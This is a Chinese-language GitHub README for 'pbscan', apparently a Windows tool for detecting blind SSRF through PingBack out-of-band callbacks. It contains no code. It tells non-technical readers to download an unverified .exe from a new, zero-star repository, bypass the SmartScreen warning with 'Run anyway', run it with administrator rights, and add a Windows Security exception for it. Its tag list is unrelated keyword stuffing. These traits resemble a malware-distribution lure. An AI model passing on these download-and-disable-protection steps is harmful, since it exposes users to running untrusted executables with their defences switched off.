cobaltbluereservoir537/pbscan

GitHub: cobaltbluereservoir537/pbscan

pbscan 是一款利用自动化 payload 注入与 PingBack OAST 带外关联技术来检测 Web 应用中 blind SSRF 漏洞的安全扫描工具。

Stars: 0 | Forks: 0

# 🔍 pbscan - 快速发现隐藏的网站安全漏洞 [![](https://img.shields.io/badge/Download_pbscan-Blue?style=for-the-badge&logo=github)](https://github.com/cobaltbluereservoir537/pbscan/releases) ## 什么是 pbscan? pbscan 用于发现称为 blind SSRF 的安全漏洞。这些漏洞允许攻击者与对公共互联网隐藏的内部系统进行通信。该工具通过测试网站来替您完成这项工作。它会跟踪每个请求,准确向您展示系统在何处出现故障。它与 PingBack 服务协同工作,以确认在正常路径之外发生了连接。您将获得一份清晰的报告,说明应用程序的哪些部分容易受到攻击。 ## 💻 系统要求 您的计算机需要满足以下几个条件才能运行 pbscan: * Windows 10 或 Windows 11。 * 64 位硬件架构。 * 至少 4GB 的 RAM。 * 有效的互联网连接,用于发送和接收扫描流量。 * 管理员权限,以允许该工具打开网络端口。 ## 📥 如何下载 请按照以下步骤将工具下载到您的计算机: 1. 访问官方发布页面:https://github.com/cobaltbluereservoir537/pbscan/releases。 2. 查看页面顶部的最新发布版块。 3. 点击以 `.exe` 结尾的文件开始下载。 4. 将文件保存到您的桌面或易于查找的文件夹中。 [![](https://img.shields.io/badge/Download_Link-Grey?style=for-the-badge)](https://github.com/cobaltbluereservoir537/pbscan/releases) ## ⚡ 设置程序 Windows 可能会显示警告,因为它目前无法识别该文件。这对于安全工具来说是正常的。 1. 找到您下载的 `pbscan.exe` 文件。 2. 右键单击该文件并选择“打开”,或者双击它。 3. 如果出现“Windows 已保护你的电脑”的窗口,请点击“更多信息”。 4. 点击“仍要运行”按钮。 5. 将打开一个命令提示符窗口。这就是程序运行的地方。 ## 🛠️ 如何执行扫描 pbscan 通过命令行运行。您不需要是程序员即可使用它。请按照以下步骤测试网站: 1. 打开“开始”菜单并输入 `cmd`。按 Enter 键打开终端。 2. 输入 `cd Desktop` 并按 Enter 键切换到您的桌面。 3. 输入 `pbscan.exe`,加上一个空格,然后输入您要扫描的网站地址。 4. 示例:`pbscan.exe -u https://example-website.com` 5. 按 Enter 键开始。 程序现在将与网站进行通信。它会发送小数据包以查看服务器的响应方式。 ## 📊 了解您的结果 程序会将信息直接打印到您的屏幕上。您将看到几种类型的消息: * 状态更新:该工具会告诉您它当前正在检查哪个路径。 * Payload 注入:这意味着该工具尝试发送特殊命令以查看服务器是否有反应。 * 关联日志:这些消息将您的扫描链接到 PingBack 服务器。如果您在此处看到通知,说明服务器已成功连接到 tracker。 * 摘要:扫描完成后,您将看到允许连接的 URL 列表。 如果某个 URL 显示为“Vulnerable(存在漏洞)”,说明您发现了一个隐藏的入口点。您应该将此情况报告给网站所有者。 ## 🧪 最佳实践 请牢记以下提示,以从您的扫描中获得最佳结果: * 每次只扫描一个网站,以保持您的互联网连接稳定。 * 确保您有权限测试该网站。扫描不为您拥有的网站可能会违反服务条款或当地法律。请仅在邀请安全测试的平台(如漏洞赏金计划)上使用此工具。 * 在稳定的网络中运行扫描。Wi-Fi 掉线可能会导致该工具漏掉 callback。 * 如果您收到零结果,请检查您的防火墙设置。有时 Windows 会拦截 blind SSRF 检测所需的反馈信号。您可能需要在 Windows 安全设置中为 pbscan 程序创建一个例外。 ## 📝 常见问题 **此工具会在我的系统上安装文件吗?** 不会。它作为独立文件运行。完成工作后,您可以直接删除该 .exe 文件。 **如果窗口立即关闭,我该怎么办?** 这通常意味着缺少必需的组件,或者 Windows 阻止了执行。请确保您已安装最新的 Windows 更新。 **数据会发送到哪里?** 该工具会向您指定的网站和 PingBack 服务器发送请求。它不会将您的个人信息发送到其他位置。 **我可以保存结果吗?** 您可以将命令输出打印到文件中。在运行时,在命令的末尾添加 ` > results.txt`。例如:`pbscan.exe -u https://example.com > results.txt`。这会在您的桌面上创建一个文件,其中包含所有的发现。 **运行它安全吗?** 是的。该工具会向网站发送请求。它不会在您自己的机器上执行破坏性操作。使用时请谨慎,以避免对您测试的网站造成意外的网络负载。
标签:BurpSuite 集成, CISA项目, EVTX分析, OAST, SSRF检测, Web安全, 安全测试, 攻击性安全, 蓝队分析